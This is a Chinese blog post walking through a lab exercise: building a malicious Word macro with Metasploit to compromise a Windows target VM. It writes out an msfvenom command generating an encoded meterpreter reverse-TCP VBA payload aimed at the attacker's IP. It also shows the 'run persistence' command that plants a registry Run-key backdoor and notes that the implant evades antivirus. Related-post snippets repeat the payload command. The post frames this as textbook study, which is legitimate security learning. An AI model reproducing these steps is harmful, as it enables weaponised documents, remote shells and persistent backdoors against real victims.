使用Kali Linux Metasploit 复现 word宏

已于 2022-10-02 20:30:26 修改
阅读量1.4k 收藏 10
点赞数
分类专栏: Kali Linux 文章标签: linux kali
于 2022-10-01 22:21:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xujing19920814/article/details/127138212
版权

目录

说明

按照《Kali Linux2 网络渗透测试实践指南 第二版 》第七章操作
仅供学习讨论使用,请勿进行非法操作

环境准备

“邪灵工作室“公众号”下载作者提供的 windows系统靶机 32bit
到kali 官网下载对应虚拟机并完成安装
上述虚拟机在VM Ware中打开

步骤

确认攻击机所在网络信息

ifconfig

请添加图片描述
可以看出本机ip地址为 192.168.229.133

确认所在网络存活主机信息

nmap 192.168.229.0/24

请添加图片描述
可以看出 192.168.229.135和192.168.229.136存活

构建宏病毒文件

使用msfvenom命令一个VBA类型的被控端

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.229.133 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe

LHOST为Kali Linux所在的攻击机
生成的内容
请添加图片描述
请添加图片描述
请添加图片描述

构建宏文件

MACRO CODE
请添加图片描述
PAYLOAD DATA请添加图片描述
复制该word宏病毒文件至目标靶机

Metasploit

使用resverse_tcp exploit进行攻击

请添加图片描述

目标靶机打开word宏文件

攻击主机上监听4444端口,等待反弹会话成功
请添加图片描述

将宏文件加入系统启动项

使用run persistence命令

meterpreter > run  persistence -X -i  5  -p 4444 -r 192.168.229.133

此处p和r的参数均为LHOST, LPORT,即kali linux这台机器
请添加图片描述
下图,看目标主机注册表 Run 键值果然被写入了一个 xBGTyPHvfmbdk 的键值,执行后门 vbs 脚本
请添加图片描述

win7电脑怎么找到注册表

1.点击电脑的运行“开始”键,
2.搜索框里面输入“regedit”,
3.出现注册表程序“regedit.exe”,点击此程序。

验证随着系统启动而启动,控制不会中断

重启windows靶机
打开新的监听
请添加图片描述
登录windows靶机
结果 成功
请添加图片描述

删除注册表键值,再次验证

请添加图片描述

打开新的监听
结果,失败
请添加图片描述

此处参考渗透测试 ( 4 ) — Meterpreter 命令详解
Meterpreter 的强大之处之一在于它运行于内存中,不易被杀毒软件发现,但只要目标机环境合适,或你对自己的免杀足够自信,可通过该命令写入硬盘,下次目标机启动时,木马将会自启动。
执行过程:创建攻击载荷 -> 攻击载荷植入到目标主机 c:\windows\temp目录下,是一个.vbs的脚本 -> 写目标主机注册表键值实现开机自动运行。

有梦想的人运气不太差
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Kali Linux系统使用基础教程.zip
06-28
Kali Linux系统使用基础教程.zip
kali linux渗透测试技术详解综合笔记1
世界那么大,我要学编程看看!
06-11 2601
kali linux渗透测试技术详解综合笔记1
Kali-linux攻击WordPress和其他应用程序
2301_77162959的博客
05-11 1463
今天越来越多的企业利用SAAS(Software as a Service)工具应用在他们的业务中。例如,他们经常使用WordPress作为他们网站的内容管理系统,或者在局域网中使用Drupal框架。从这些应用程序中找到漏洞,是非常有价值的。为了收集用于测试的应用程序,Turnkey Linux是一个非常好的资源。Turnkey工具的官方网站是Turnkey Linux发行版。
Kali渗透测试:使用Word病毒进行渗透攻击
Liu_Bruce的博客
05-14 4119
Kali渗透测试:使用病毒进行渗透攻击 VBA是基于Visual Basic发展而来的,与Visual Basic具有相似的语言结构。使用VBA可以完成很多事情,基于Excel、Word的VBA小程序不计其数。病毒在Word中引入之后出现的。目前Office 是较为流行的编辑软件,并且跨越了多种操作系统,病毒利用这一点得到了大范围的传播。 构造一个包含病毒的Word文件也并不复杂,只要编写一个Auto_Open函数,就可自动引发病毒。 在Word打开这个文件时, 病毒会执行, 然后感染其他文件或
病毒实验讲解(含共享文件夹建立)
m0_57069925的博客
09-21 921
vmware共享文件夹只是方便把文件在虚拟机和物理机直接传送要是不需要可以直接跳到第二部分看实验。
病毒复现
qq_23066945的博客
11-09 1002
病毒复现 1、简单讲讲病毒 百度:病毒是一种寄存在文档或模板的中的计算机病毒。一旦打开这样的文档,其中的就会被执行,于是病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种病毒,而且如果其他用户打开了感染病毒的文档,病毒又会转移到他的计算机上。 运行成功能够直接getshell 2、msf生成病毒 msfvenom -p w...
网络安全kali之利用感染word文档获取shell
xueshenlaila的博客
03-25 8110
首先将office 2016.zip上传到win7虚拟机上,解压后,安装一下office。 ┌──(root💀xuegod53)-[~] └─# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe 执行完成后会生成2段代码 第一段代码是MACRO CODE [ˈmækrəʊ k
Kali Linux系统使用基础教程.pdf
11-29
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
kali-linux 工具Metasploit离线式攻击使用教程
12-29
攻击实例讲解4-Metasploit离线式攻击.rar
kali安装AntSword.zip
04-19
安装见压缩包内文档,内有AntSword-Loader-v4.0.3-linux-x64.zip、antSword-master.zip。
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
使用kali-linuxMetasploit Framework接入互联网的使用教程
最新发布
12-29
使用kali-linuxMetasploit Framework接入互联网的使用教程
网络安全学习日志(8)word简单病毒的制作
qq_41819426的博客
01-17 7583
环境及使用工具 靶机:windows7 攻击机:kali 本地主机:windows10 用于word文件生成 软件:CS4.0 对于cs的搭建,我们这里不做赘述 实验步骤: 1.病毒的制作 1.1创建监听 首先我们打开我们的cs4.0,点击创建一个新的监听 监听地址为你的服务端地址(这里是我的kali地址) 1.2通过attack栏来得到word病毒的脚本 复制其内容即可 1.3创建一个word文件,并通过视图点击创建 注意:的位置选项一定要选择最后一项,即文件的本地位置 将代码复制后保
【真正解决】Intellij IDEA导入项目出现Cannot load settings from file错误
热门推荐
cy_an的博客
09-03 2万+
出现这个问题一般是手动更改项目文件位置了,idea根据配置文件找不到文件,所以报错。 找到idea配置文件夹,打开modules.xml文件 找到提示的文件,把对应项删除,或者修改成为正确路径。
Kali linux下解决wps office 安装以及依赖问题
github_39217805的博客
06-19 9670
首先去WPS的linux官网(http://community.wps.cn/download/),下载安装包,32位电脑下载32位,64位电脑下载64位,下载以.deb结尾的那一个。 把安装包复制到home文件夹。 在安装之前,先准备libpng12-0。因为在安装的时候会提示libpng12-0的依赖关系。去(https://packages.debian.org/zh-cn/wheezy/am
2018-11 kali安装WPS Office记录
昨天今天下雨天的博客
11-05 1777
1. 安装:apt install wps-office  (无法安装的话可以去WPS官网下载安装包( www.wps.cn/product/wpslinux/# ),然后使用命令:dpkg -i /root/下载/wps-office_10.1.0.6757_amd64.deb)                 注意: dpkg是用来安装.deb文件,但不会解决模块的依赖关系,且不会关心软件仓...
kali安装wps办公软件
shuangmu9768的博客
09-12 2万+
kali安装wps办公软件 1.官网下载wps,或复制下面的地址直接下下载: https://wdl1.cache.wps.cn/wps/download/ep/Linux2019/8865/wps-office_11.1.0.8865_amd64.deb 2.安装wps sudo dpkg -i wps-office_11.1.0.8865_amd64.deb 3.下载字体 http://tcy.198424.com/symbol-fonts_all.deb 4.安装字体
Kali Linux中英文切换
xujing19920814的博客
09-01 5978
Kali linux默认为英语,可以执行以下命令切换为中文: echo LANG="zh_CN.UTF-8" > /etc/default/locale 切换好,执行 reboot 重启即可。 同理,切换为英文 echo LANG="en_US.UTF-8" > /etc/default/locale 切换好,执行 reboot ...
kali使用metasploit
08-26
Kali Linux 是一款专门为网络安全测试和渗透测试而设计的操作系统,并且内置了 Metasploit 框架。Metasploit 是一个用于开发和执行各种渗透测试和漏洞利用的工具集。 要使用 Metasploit,首先打开终端并输入"msfconsole"命令,这会启动 Metasploit 控制台。在控制台中,你可以使用各种命令来搜索和利用漏洞。 例如,你可以使用"search"命令来搜索特定漏洞或攻击模块。例如,输入"search exploit"将会列出所有可用的漏洞利用模块。 接下来,你可以使用"use"命令选择一个特定的漏洞利用模块。例如,输入"use exploit/windows/smb/ms08_067_netapi"将选择 MS08-067 漏洞利用模块。 然后,你可以使用"show options"命令查看该模块的可配置选项。根据需要,你可以设置不同的参数值。 最后,使用"exploit"命令执行漏洞利用。根据具体情况,它可能会尝试获取对目标系统的访问权限或执行其他操作。 重要提示:请确保你在合法授权和合法目的的情况下使用 Metasploit 工具。在进行任何渗透测试活动之前,请确保已经取得相关授权和充分测试环境。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值